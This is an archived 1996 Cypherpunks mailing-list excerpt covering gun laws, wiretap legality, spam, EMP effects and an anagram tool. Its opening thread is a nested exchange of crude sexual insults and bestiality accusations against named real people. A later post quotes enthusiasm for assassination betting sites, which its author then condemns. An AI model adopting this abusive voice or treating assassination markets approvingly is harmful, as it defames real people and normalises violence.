From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 6 Oct 1996 00:49:51 +0800
To: cypherpunks@toad.com
Subject: [SPAM] "Childish fool" Timmy May abuses mor(m)ons, spawns flame threads
In-Reply-To: <Pine.SUN.3.91.961005071820.9224A-100000@crl5.crl.com>
Message-ID: <N2XBVD17w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Timmy May has no life.

>Date: Sat, 5 Oct 1996 07:19:22 -0700 (PDT)
>From: Sandy Sandfort <sandfort@crl.com>
>To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
>Subject: Re: [SPAM] More "fuckhead" e-mail from Timmy May and his young friends
>In-Reply-To: <uk5aVD10w165w@bwalk.dm.com>
>Message-Id: <Pine.SUN.3.91.961005071820.9224A-100000@crl5.crl.com>
>Mime-Version: 1.0
>Content-Type: TEXT/PLAIN; charset=US-ASCII
>
>Please stop spamming the list.  It is rude and disrespectful to
>all list members.  It makes you look like a childish fool.
>
>On Fri, 4 Oct 1996, Dr.Dimitri Vulis KOTM wrote:
>
>> Timmy May has no life.
>>
>> >From: Troy Varange <varange@crl.com>
>> >Message-Id: <199610050215.AA00807@crl5.crl.com>
>> >Subject: Re: [VULIS]
>> >To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>> >Date: Fri, 4 Oct 1996 19:15:36 -0700 (PDT)
>> >In-Reply-To: <FV67uD8w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Oct 2, 96 08:29:14 pm
>> >X-Mailer: ELM [version 2.4 PL23]
>> >Mime-Version: 1.0
>> >Content-Type: text/plain; charset=US-ASCII
>> >Content-Transfer-Encoding: 7bit
>> >Content-Length: 7527
>> >
>> >>
>> >> I have no dog, nor any other pets.  Timmy May (fart) reportedly has two cats.
>> >> If you suspect that Timmy May (fart) sexually abuses his cats, or any other
>> >> animals, you should promptly contact the ASPCA and also alert rec.pets.cats.
>> >>
>> >> (Frankly, I doubt that the old fart can get his dick up to sexually abuse
>> >> anything, including his cats. Senility puts an end to sexual molestation.)
>> >>
>> >> >From: Troy Varange <varange@crl.com>
>> >> >Message-Id: <199610021931.AA24883@crl11.crl.com>
>> >> >Subject: Important
>> >> >To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>> >> >Date: Wed, 2 Oct 1996 12:31:21 -0700 (PDT)
>> >> >In-Reply-To: <gqH3uD93w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 30, 96 07:57:27 am
>> >> >X-Mailer: ELM [version 2.4 PL23]
>> >> >Mime-Version: 1.0
>> >> >Content-Type: text/plain; charset=US-ASCII
>> >> >Content-Transfer-Encoding: 7bit
>> >> >Content-Length: 6226
>> >> >
>> >> >Dr. Vulis sucks his dog's butt.
>> >> >
>> >> >> Timmy May has no life.
>> >> >>
>> >> >> >From: Troy Varange <varange@crl.com>
>> >> >> >Message-Id: <199609300441.AA10704@crl12.crl.com>
>> >> >> >Subject: Re: Vulis FUCKHEAD sucks Timmy's Cock
>> >> >> >To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>> >> >> >Date: Sun, 29 Sep 1996 21:41:42 -0700 (PDT)
>> >> >> >In-Reply-To: <LJV2uD91w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 11:58:09 pm
>> >> >> >X-Mailer: ELM [version 2.4 PL23]
>> >> >> >Mime-Version: 1.0
>> >> >> >Content-Type: text/plain; charset=US-ASCII
>> >> >> >Content-Transfer-Encoding: 7bit
>> >> >> >Content-Length: 5298
>> >> >> >
>> >> >> >Vulis sucks Timmy's boyfriend's cock.
>> >> >> >>
>> >> >> >> Timmy May has no life.
>> >> >> >>
>> >> >> >> >From: Troy Varange <varange@crl.com>
>> >> >> >> >Message-Id: <199609300332.AA09870@crl12.crl.com>
>> >> >> >> >Subject: Re: [SPAM] More "fuckhead" fan mail from Timmy "peteur" May
>> >> >> >> >To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>> >> >> >> >Date: Sun, 29 Sep 1996 20:32:58 -0700 (PDT)
>> >> >> >> >In-Reply-To: <ueP2uD86w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 09:45:41 pm
>> >> >> >> >X-Mailer: ELM [version 2.4 PL23]
>> >> >> >> >Mime-Version: 1.0
>> >> >> >> >Content-Type: text/plain; charset=US-ASCII
>> >> >> >> >Content-Transfer-Encoding: 7bit
>> >> >> >> >Content-Length: 4378
>> >> >> >> >
>> >> >> >> >>                    berserk
>> >> >> >> >> Timmy May has gone        . Has he been eating speed?
>> >> >> >> >>                    bananas
>> >> >> >> >>
>> >> >> >> >> >From: Troy Varange <varange@crl.com>
>> >> >> >> >> >Message-Id: <199609300138.AA08482@crl12.crl.com>
>> >> >> >> >> >Subject: Re: [SPAM] More fan mail from Timmy "peteur" May
>> >> >> >> >> >To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>> >> >> >> >> >Date: Sun, 29 Sep 1996 18:38:05 -0700 (PDT)
>> >> >> >> >> >In-Reply-To: <FFi2uD82w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 07:14:50 pm
>> >> >> >> >> >X-Mailer: ELM [version 2.4 PL23]
>> >> >> >> >> >Mime-Version: 1.0
>> >> >> >> >> >Content-Type: text/plain; charset=US-ASCII
>> >> >> >> >> >Content-Transfer-Encoding: 7bit
>> >> >> >> >> >Content-Length: 3442
>> >> >> >> >> >
>> >> >> >> >> >>
>> >> >> >> >> >> What has Timmy been smoking?
>> >> >> >> >> >>
>> >> >> >> >> >> ]From paul@fatmans.demon.co.uk  Sun Sep 29 19:03:40 1996
>> >> >> >> >> >> ]Received: by bwalk.dm.com (1.65/waf)
>> >> >> >> >> >> ]	via UUCP; Sun, 29 Sep 96 19:14:06 EDT
>> >> >> >> >> >> ]	for dlv
>> >> >> >> >> >> ]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
>> >> >> >> >> >> ]        id AA25790 for dlv@bwalk.dm.com; Sun, 29 Sep 96 19:03:40 -0400
>> >> >> >> >> >> ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net  id ac16129;
>> >> >> >> >> >> ]          29 Sep 96 15:59 BST
>> >> >> >> >> >> ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net
>> >> >> >> >> >> ]           id aa09441; 29 Sep 96 15:54 BST
>> >> >> >> >> >> ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP
>> >> >> >> >> >> ]	id AA843903697 ; Sat, 28 Sep 96 09:41:37 +0000
>> >> >> >> >> >> ]Comments: Authenticated sender is <paul@fatmans.demon.co.uk>
>> >> >> >> >> >> ]From: paul@fatmans.demon.co.uk
>> >> >> >> >> >> ]To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
>> >> >> >> >> >> ]Date: Sat, 28 Sep 1996 09:21:37 +0000
>> >> >> >> >> >> ]Mime-Version: 1.0
>> >> >> >> >> >> ]Content-Type: text/plain; charset=US-ASCII
>> >> >> >> >> >> ]Content-Transfer-Encoding: 7BIT
>> >> >> >> >> >> ]Subject: Re: Possible subs attack????
>> >> >> >> >> >> ]Priority: normal
>> >> >> >> >> >> ]X-Pm-Encryptor: JN-PGP-P, 4
>> >> >> >> >> >> ]X-Mailer: Pegasus Mail for Windows (v2.31)
>> >> >> >> >> >> ]Message-Id: <844008901.9441.0@fatmans.demon.co.uk>
>> >> >> >> >> >> ]
>> >> >> >> >> >> ]-----BEGIN PGP SIGNED MESSAGE-----
>> >> >> >> >> >> ]
>> >> >> >> >> >> ]
>> >> >> >> >> >> ]> The lying sack of shit Timmy May <paul@fatmans.demon.co.uk> writes:
>> >> >> >> >> >> ]
>> >> >> >> >> >> ]> The lying sack of shit Timmy May lies again, as usual.
>> >> >> >> >> >> ]
>> >> >> >> >> >> ]Fuck you,
>> >> >> >> >> >> ]
>> >> >> >> >> >> ]I am not Tim May, Check out the return path if you don`t believe me,
>> >> >> >> >> >> ]if you still don`t here`s my PGP public key signed by the EFF, they
>> >> >> >> >> >> ]don`t sign keys here and there without checking ID`s...
>> >> >> >> >> >> ]
>> >> >> >> >> >> ]Type Bits/KeyID    Date       User ID
>> >> >> >> >> >> ]pub  1024/5BBFAEB1 1996/07/30 Paul Bradley <paul@fatmans.demon.co.uk>
>> >> >> >> >> >> ]
>> >> >> >> >> >> ]- -----BEGIN PGP PUBLIC KEY BLOCK-----
>> >> >> >> >> >> ]Version: 2.6.3ia
>> >> >> >> >> >> ]
>> >> >> >> >> >> ]mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
>> >> >> >> >> >> ]6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
>> >> >> >> >> >> ]sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
>> >> >> >> >> >> ]tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
>> >> >> >> >> >> ]NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
>> >> >> >> >> >> ]Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
>> >> >> >> >> >> ]j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
>> >> >> >> >> >> ]C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
>> >> >> >> >> >> ]9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
>> >> >> >> >> >> ]En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
>> >> >> >> >> >> ]YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
>> >> >> >> >> >> ]put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
>> >> >> >> >> >> ]LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
>> >> >> >> >> >> ]mUqFH41Z7NkyO8ZFdi5GGX0=
>> >> >> >> >> >> ]=CMZA
>> >> >> >> >> >> ]- -----END PGP PUBLIC KEY BLOCK-----
>> >> >> >> >> >> ]
>> >> >> >> >> >> ]
>> >> >> >> >> >> ]
>> >> >> >> >> >> ]-----BEGIN PGP SIGNATURE-----
>> >> >> >> >> >> ]Version: 2.6.3ia
>> >> >> >> >> >> ]Charset: cp850
>> >> >> >> >> >> ]
>> >> >> >> >> >> ]iQCVAwUBMkzuH75OPIRbv66xAQHSmQQAqw0F/lIsCcQwOpiSQDx4hMqOVVUVXbyR
>> >> >> >> >> >> ]3RMWY20ECE0TpAtJ6hkAiqphsWUSBqiFj2kGHMh+jHSHXIMPF+m1qtwVbgutJC7B
>> >> >> >> >> >> ]8VYWj0VP+bGu5dEUisLrVHDNj5ucEIDyK2GnqObiCiKARFUbOuZnMQOp9TDJqibh
>> >> >> >> >> >> ]2Wqa5+h8R7g=
>> >> >> >> >> >> ]=/M2U
>> >> >> >> >> >> ]-----END PGP SIGNATURE-----
>> >> >> >> >> >> ]
>> >> >> >> >> >> ]  Datacomms Technologies web authoring and data security
>> >> >> >> >> >> ]       Paul Bradley, Paul@fatmans.demon.co.uk
>> >> >> >> >> >> ]  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org
>> >> >> >> >> >> ]       Http://www.cryptography.home.ml.org/
>> >> >> >> >> >> ]      Email for PGP public key, ID: 5BBFAEB1
>> >> >> >> >> >> ]     "Don`t forget to mount a scratch monkey"
>> >> >> >> >> >>
>> >> >> >> >> >Fuckhead.
>> >> >> >> >>
>> >> >> >> >Fuckhead.  We know your behind Vulis, Cock-sucker
>> >> >> >>
>> >> >> >and he swallows
>> >> >>
>> >> >
>> >>
>> >Fuckhead.
>>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sun, 6 Oct 1996 04:10:57 +0800
To: cypherpunks@toad.com
Subject: Re: [SARCASM] Re: The Right to Keep and Bear Crypto
In-Reply-To: <v02130500ae79cef28e84@[10.0.2.15]>
Message-ID: <v03007802ae7c549d698c@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:03 AM +0000 10/5/96, attila wrote:

>        essentially, assault weapons are illegal; in california (where
>    else), the possesion of a weapon with a flash suppressor is illegal;
>    as is possesion of the older 10 shot clips for the .223 class
>    weapons (not to mention the 20 and 30 shot clips or the double
>    sided bananas at 40!).

No, this is not correct. There are no restrictions whatsoever on possession
of 10-round, 20-round, or even 100-round magazines. They are still being
sold in gun stores, sportings goods stores (when available), flea markets,
gun shows, etc.

What you may be thinking of is the recent restriction on manufacture of
*new* magazines with greater than 10-round capacity, except for sale to law
enforcement and related persons (retired cops, some retired military, etc.)

Sales of _existing_ magazines, made before the ban on new mags went into
effect, are unaffected. And the magazine makers went into double overtime
to make more mags in the several months of "warning" they had, especially
as magazine prices went way up. The military has bought literally hundreds
of millions of .223 (5.56 mm) mags over the past several decades, and these
are widely available, cheaply.

Obvious to us all, even the anti-gun contingent, should be the point that a
perp intent on killing a lot of people will be unaffected by the magazine
ban. First, because such mags are widely available and cannot be taken off
the streets, even if martial laws were to be declared. Second, because
magazine changes are very fast...a schoolyard mass-killer will be
unaffected by having to insert 10 5-round magazines. (And a shotgun would
be more effective in a schoolyard anyway, obviously enough.)

(This relates to absurd proposals, from folks like Moynihan, to "tax
ammunition" at stratospheric levels, e.g., $5 a round. This will obviously
not affect the perp who walks into a liquor store with a loaded pistol,
costing all of $30 to load (assuming he used store-bought ammo). What it
_would_ do is make gun-handling less safe, as target practice would become
prohibitively expensive. And what would it do to those of us with 3000 or
more rounds of ammo already bought? Or reloaders? Or the black market? Or
even the flea market?)

As for "assault weapons," it is not true that "essentially, assault weapons
are illegal." Anyone with a so-called "pre-ban" weapon was supposed to fill
out a form and file it with the State of California (and pay a fee of some
sort, I suppose). But such guns are most definitely not illegal. (Evidence
is that 80% of so-called assault rifles have so far failed to fill out the
mandated forms. No prosecutions have been reported in the several years
this requirement has been in effect.)

Nor is a "flash suppressor" ipso facto illegal. (BTW, the prime role of a
flash suppressor is to let the shooter keep his night vision by not
partially blinding him as the flash goes off...a secondary role, never
shown to be significant, is to reduce the flash visible to opponents far
away.) A "flash suppressor" is one of the several "points" which can make a
gun into an Evil, Babykilling, Not Useful for Hunting Assault Killer
Weapon. Other "points" being a pistol grip, a bayonet mount, and perhaps
other factors.

My Colt .223 H-BAR AR-15 is perfectly legal in California. As are the
dozens of 20-round mags I have for it, and the 30- and 40-round mags I
bought for it in a local store.

--Tim May





"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sun, 6 Oct 1996 00:48:39 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Electromagnetic Pulse
In-Reply-To: <v03007800ae7b96a03b48@[207.167.93.63]>
Message-ID: <199610051540.KAA09023@homeport.org>
MIME-Version: 1.0
Content-Type: text


Timothy C. May wrote:

| By the way, it's a myth of our age that nukes destroy electronics!

See 'The Effects of Radiation on Electronic Systems' Second Ed
George Messenger, Milton Ash, 1992, ISBN 0-442-23952-1

if you're really interested.  It seems to be the only public textbook
on these matters.  Basicly, Tim is correct.

Adam

-- 
"Every year the Republicans campaign like Libertarians, and then go to
Wasthington and spend like Democrats."

Vote Harry Browne for President.  http://www.harrybrowne96.org







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@USIT.NET>
Date: Sun, 6 Oct 1996 00:56:09 +0800
To: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Subject: Re: The Right to Keep and Bear Crypto
In-Reply-To: <Pine.SUN.3.95.961004110522.10345G-100000@viper.law.miami.edu>
Message-ID: <Pine.GSO.3.95.961005104028.18020G-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 4 Oct 1996, Michael Froomkin - U.Miami School of Law wrote:

[pro-gun-control flame deleted]

> I should also add for the benefit of certain third parties to this debate
> that I stopped responding to gun control flames three years ago after the
> email flood attack by rabid pro-gun people that temporarily crashed my
> account.
> 
> I do not mean by this to attempt to stifle any discussion, only to explain
> why I'll concentrate on baby-tending and other work rather than go on in
> this vein. 
> 

How do strong, fundamental disagreements get resolved if discussion is not
possible?

Granted that CP is not the right forum.

bd






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: travel23@juno.com (The Traveler)
Date: Sun, 6 Oct 1996 01:19:48 +0800
To: cypherpunks@toad.com
Subject: Re: Who the heck is "CYBERPROMO" and why are they spamming me?
Message-ID: <19961005.105653.14566.0.travel23@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Ernest Hua wrote:
>
>I keep getting mail from an "abusebot@savetrees.com" ...
>
>This is getting very very annoying.

  They're a company involved in mass emailing ads on behalf of their
clients.  They have also sued AOL because of the latter's trying to
protect their subscribers by blocking Cyberpromo's ads.  Cyberpromo
obtained a TRO stopping AOL's block, but the TRO  was set aside on
appeal.
  Dale Thorn posted the following on this list in response to ads he was
receiving from Cyberpromo, specifically:
> If you would like to send a complaint about any account @cyberpromo.com
   
> @answerme.com or @omni.cyberpromo.com  that has not been terminated,
>please send email to: wallace@cyberpromo.com
  I believe Cyberpromo is run by Sanford Wallace.  Think he was also on
60 Minutes raising First Amendment rights along with Free Enterprise
concepts.
  So, is it a spam or someone legitimately using the net in the ordinary
course of business?

T.T.

    
.................................................................................
              Just consider me an acorn who is trying
                   to deal with the rest of the nuts 
    
.................................................................................









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sat, 5 Oct 1996 21:36:36 +0800
To: tcmay@got.net>
Subject: [SARCASM] Re: The Right to Keep and Bear Crypto
In-Reply-To: <v02130500ae79cef28e84@[10.0.2.15]>
Message-ID: <199610051202.GAA04320@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <v02130500ae79cef28e84@[10.0.2.15]>, on 10/03/96 
   at 09:02 PM, azur@netcom.com (Steve Schear) said:

-.It is ludacrous to expect citizens armed with no more than side arms,
-.bolt-actions and shot guns to resist the actions of a modern military or law
-.enforcement which citizens may find in violation of their inaliable natural
-.rights (whether mistaken or not).

        aah, but it certainly suits the government who was mandated to
    be *our* servants, does it not?  after all, how can they usurp the
    power to rule us if they are denied the 1,000,000 times overkill 
    they have deemed necessary to "govern," rather than serve, us.

        2000 years ago, the wag Marcellus said: "...the lowest element
    of our [Roman] society is the police...."  

        we talk about the 'thin blue line' between us and the criminal
    element --it is thin because far too many of our supposed pro-
    tectors are on the 'wrong' side of the thin blue line; basically, 
    they have been granted, by an illegal government, a legal right 
    to break our heads with their night stick...  at their discretion.

-.In my opinion, all citizens should be be
-.able to keep and bear any arms (without registration) which the state might
-.use against them.   To do so now is a criminal action.  So be it.
-. 
        essentially, assault weapons are illegal; in california (where 
    else), the possesion of a weapon with a flash suppressor is illegal;
    as is possesion of the older 10 shot clips for the .223 class 
    weapons (not to mention the 20 and 30 shot clips or the double 
    sided bananas at 40!).

        the government is just being realistic  --why should they grant
    us a right which we might use to protect our constitutional rights
    and topple their corrupted government?

        crap!       --or, maybe galloping prairie muffins!

        I'm not sure I want my neighbors to park a loaded panzer in 
    their front yard...   or indulge in clipping every midnight 
    (exhausting a clip in wanton fire)...  or store 5+ gallons of liquid
    nitroglycerin (which should be interesting in our 120 degree
    summer heat)...
    
        my neighbors and I might be justified in gently placing one big
    mutha of a blast mat over the neighbors property --even if that
    might be prior restraint, but to go so far as to say let's kill him
    before anything happens is certainly preempting his rights.

        unfortunately, those are the same arguments our imperious 
    government uses to justify limiting or prohibiting our personal 
    armaments, no matter how small.  even BB guns are facing regulation
    now....  

        ...and to think I received my very own .22 rifle and 4-10X 
    scope for my sixth birthday!  the life expectancy of the local 
    'herd' of jack rabbits took a sudden nose-dive!  by 10 I had a 
    semi-automatic and the ratio fell again --multiple kills before 
    the field was clear!  the arrival of the .223s years later made it 
    exciting --the explosive level suddenly became satisfying!

        am I begging to sound like one of our famous online 
    personalities yet? <g>

-.Unfortunately, it is common for groups especially governmental to be
-.come statist, mean spirited and eventually malevolent.
-.
        power is intoxicating
          power corrupts
            absolute power corrupts absolutely

    or, in other words, 'what else is new?'

-.I hope jim bell or his ilk are soon successful at putting up functional,
-.anonymous and active AP sites.  I can't wait to wager!

        have you been smoking something special these days?

        and why only wager?  --are you not planning to participate?
    after the first shower of a bloody head shot, the rest are easy.

        as tanatlizing the argument for AP may be, it is a childish
    and petty display, a temper tantrum: the cowardly exercise 
    of revenge.

        very little, in anything, warrants revenge; there are needs to 
    redress legitimate wrongs, and therefore ways.  what has 
    fundamentally gone wrong in our society is there is little justice,
    particularly v/v our corrupt elected officials and their 
    paymasters; and execution takes over 10 years by the time 
    every bleeding heart tries an appeal for the occasionally condemned.

        Big Ed Davis, who preceded Daryll Gates as LA police chief,
    had a perfect solution for airline hijackers:

         Big Ed Davis actually parked a long semi-trailer in front of 
    the American terminal at LAX for the purpose:  at the front was 
    the judge's dias, a jury box along one side, lawyers opposite, 
    and a gallows at the far end.  

        there would be an immediate trial by selecting a jury of 12 of
    his peers, chosen as they cleared the arriving flight doors,  and 
    even places for the 3 judge appeal required by CA capital punish-
    ment laws.

        very efficient --and it would not cost the state $10-15 MILLION
    to execute just one criminal.  --the execution would be public, 
    obviously, immediately after the appeal!  I mean, you could do the 
    whole deed and serve justice on your lunch hour!   

        you should have heard the liberals scream about what was 
    nothing less than poetic justice!  even a jury of his peers, real
    peers!

        Big Ed left it parked in front of American until the ACLU filed
    and successfully obtained a permanent injunction against him.   

        Big Ed was a bit colorful <g>; interesting; and definitely not 
    unintelligent --he was my CA state Senator for years after retiring 
    from the force.  

        Anybody wanna guess his party affiliation? --at one time he 
    was on the ballot as both a republican and a libertarian. 

        you should hear Big Ed on privacy issues --he makes all of you
    sound like lost jacklegs and pikers.

        ***************************************************************
        CAVEAT:  under no conditions could I ever condone Jim Bell's
    Assassination Politics --it may be anarchistic in and of itself, but
    it is a thinly disguised criminal amentality, not only from the 
    extant of trying to 'moralize' murder, but a form of power politics
    (and shadow government) which actually exceeds the abuses of our
    supposedly democratic republic run amuk with abusive police powers.

    Not only is revenge politics immoral, but AP is a corruption of 
    society by lawless and arbitrary behavior of a few players who can
    afford the price of entry (to the betting pools).
        ***************************************************************

--
  "I don't make jokes. 
    I just watch the government and report the facts."
        --Will Rogers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Sat, 5 Oct 1996 16:02:09 +0800
To: cypherpunks@toad.com
Subject: anagrams
Message-ID: <199610050242.MAA07877@suburbia.net>
MIME-Version: 1.0
Content-Type: text



Fast(est?) anagram generator:

ftp://suburbia.net/pub/proff/original/gan/an-0.93.tar.gz
(unix source and dos executable)


Some Anagrams Found Using an-0.92
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Free Software Foundation  -  I'd fan out tons of freeware!
National Security Agency  -  Lusty yearning at cocaine.
President Dole            -  Led despite Ron.
Central Intelligence Agency - Langley: Inelegant, eccentric.

-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Sun, 6 Oct 1996 07:31:33 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: legality of wiretapping: a "key" distinction
Message-ID: <3.0b28.32.19961005135759.006a8d70@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:42 PM 10/4/96 -0800, jim bell wrote:

>I've been saying this for years!  I think that one of the most telling 
>arguments is that the main (if not the only!) reason that wiretaps are kept 
>secret is that, for obvious technical reasons, they CAN BE kept secret!   
>Pardon me for being facetious, but I see no principle in the Constitution 
>that states "Anything the government can get away with is okay," so I think 
>it's predictable that wiretap law would be constitutionally defective.

I see. Wiretaps have been litigated for 70 years, but the reason they're
still Constitutional is that nobody's pointed out to a court the absence of
the "Anything the government can get away with" clause. Good thing you
found that. Are there any other secret missing clauses which render other
things unconstitutional which you haven't mentioned yet? 

>I think it's really very simple.  Wiretaps in the US were illegal until 
>1968.

Then please explain what the Supreme Court was doing some 40 years prior to
1968, in _Olmstead v. US_ 277 U.S. 438 (1928), where the product of a
wiretap was held to be admissible because without a physical trespass there
was no Fourth amendment violation. (This is no longer good law.) 

Have you ever even driven past a law library? 

>Of course, some 
>lawyers (who have been trained to accept the status quo with little or no 
>challenge) will disagree!  However, those same lawyers would have accepted 
>the Dred Scott decision without question, Plessy vs. Fergusen, etc.

There's a difference between understanding the status quo and liking it.
But making up your own interpretation of the Constitution and then just
repeating it over and over is not legal argument and doesn't win cases.
It's malpractice; and if you do it on your own behalf it's just sad to
watch. Making up your own rules is a nice philosophical exercise (and you
could probably make some money if you printed out all of your weird
conjectures and sold them to the same militia goofballs who get excited
about yellow-fringed admiralty flags and "Comptrollers' Warrants" and all
of that bullshit) but it's not useful if you want to deal with people in
the real world. It doesn't really matter if there's a secret reason why the
US Government is actually a bankrupt religious for-profit corporation
organized by FDR and income taxes go straight to the Grey Aliens and
wiretaps weren't "legal" until 1968; the legal system pretends that that's
not true, and soldiers on regardless. You can choose to understand the
legal system, or not. I think it's less dangerous to me if I understand it.
This doesn't mean I like what it does, or that I think what it does is
morally correct or consistent with the way I'd read the Constitution. But
active misunderstanding can be dangerous when you're dealing with a system
that can and will take all of your stuff away or put you in prison or kill
you.

An attorney practicing in the era of Dred Scott or Plessy v. Ferguson would
do his or her clients a serious disservice to fail to tell them what the
status quo was. Being honest and realistic is much kinder and more
responsible than being optimistic to the point of dishonesty. You clearly
have no qualms about simply making up your own version of the law and
suggesting that it's got a chance of being adopted in court. Would you want
an attorney who did that, or would you like an attorney who gave you an
honest assessment of what courts were likely to do with your argument(s)
and fact(s)? I don't want an attorney who will lie to me or help me tilt at
windmills without telling me that I'm tilting at windmills. And I don't
want an attorney who tells me "all wiretaps are unconstitutional" if
wiretap evidence can be and will be admissible.

Every few weeks there's someone on the list (whose name escapes me) that
pops up and tweaks Tim with the notion that there's no such thing as
"negative reputation", e.g., that there's no person who says things that
are consistently false. As far as I can tell, your comments about the legal
system are the proof that Tim's critic is wrong. It's really not possible
to simply make up your own version of how law ought to work, because law is
about a shared body of rules & interpretations & expectations. If you are
not sharing in the way other people do it, you are not doing law. You are
doing philosophy or navel-gazing or something else which may be very
honorable and right and good but it isn't law. 

>While I'm sure that I will be corrected if this is wrong, somehow I doubt 
>whether there has EVER been a "before-the-fact", full challenge of a wiretap 
>order _including_ representation for the target of the wiretap.

I suspect there hasn't been one because it's not required under the way the
Constitution is and has been interpreted. Here's a tip: if you think of a
way to interpret the Constitution that would make law enforcement not
merely less efficient but effectively impossible, your interpretation will
not be adopted, and therefore is not useful. It might or might not be
theoretically elegant or logically attractive, it will not be adopted. So
stop thinking about it. 

>I don't know about you, but somehow I'm past the idea that it's possible to 
>reliably get unbiased justice in court.  Know what I mean?

I agree with you, but your chances are better if you don't act like a loon.

>Well, they don't technically need the "cooperation," but they are still 
>required to inform the target.  For example, if they get a search warrant 
>for a house that happens to be empty when they show up, they are obligated 
>to leave notice of the search and lists of what was taken.  Apparently they 
>need to do this EVEN IF they would have been able to get into the house 
>surreptitiously without leaving any trace.  

Hey, you got something right. Go back to wherever you got this from and
read it some more.


--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Sun, 6 Oct 1996 06:50:59 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: [SPAM] "Childish fool" Timmy May abuses mor(m)ons, spawns flame threads
